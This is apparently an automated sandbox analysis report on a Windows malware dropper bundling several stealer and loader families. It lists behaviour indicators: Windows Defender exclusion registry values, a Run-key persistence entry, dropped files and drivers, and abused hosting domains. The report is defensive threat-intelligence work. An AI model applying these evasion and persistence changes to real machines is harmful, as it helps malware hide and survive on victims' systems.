Malware Analysis Report

2024-11-13 19:30

Sample ID 241106-mq2exsxqdz
Target e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd
SHA256 e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd
Tags
fabookie glupteba nullmixer privateloader redline socelars media22m11 publisher2 user2211 aspackv2 discovery dropper evasion execution infostealer loader persistence privilege_escalation rootkit spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd

Threat Level: Known bad

The file e8b6c5424fa57bb37b5608297e3991d5fa35e128d071f053f848a80a6a9287dd was found to be: Known bad.

Malicious Activity Summary

fabookie glupteba nullmixer privateloader redline socelars media22m11 publisher2 user2211 aspackv2 discovery dropper evasion execution infostealer loader persistence privilege_escalation rootkit spyware stealer trojan

Fabookie

Fabookie family

Glupteba

RedLine

Socelars payload

NullMixer

Redline family

Socelars family

Glupteba family

PrivateLoader

RedLine payload

Detect Fabookie payload

Nullmixer family

Windows security bypass

Socelars

Privateloader family

Modifies boot configuration data using bcdedit

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

Executes dropped EXE

ASPack v2.12-2.42

Checks installed software on the system

Manipulates WinMon driver.

Looks up external IP address via web service

Manipulates WinMonFS driver.

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Scheduled Task/Job: Scheduled Task

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-06 10:41

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 10:40

Reported

2024-11-06 10:43

Platform

win7-20240903-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Mon167f9db638e4.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\QuietDarkness = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\QuietDarkness = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Mon167f9db638e4.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\QuietDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\gimagex.exe C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
File created C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
File created C:\Program Files (x86)\Gparted\is-UTKGG.tmp C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
File created C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259448320 C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.sfx.exe C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
File created C:\Program Files (x86)\Gparted\is-LI9U0.tmp C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
File created C:\Program Files (x86)\Gparted\is-QDMNL.tmp C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\Gparted\Build.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\gimagex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe N/A
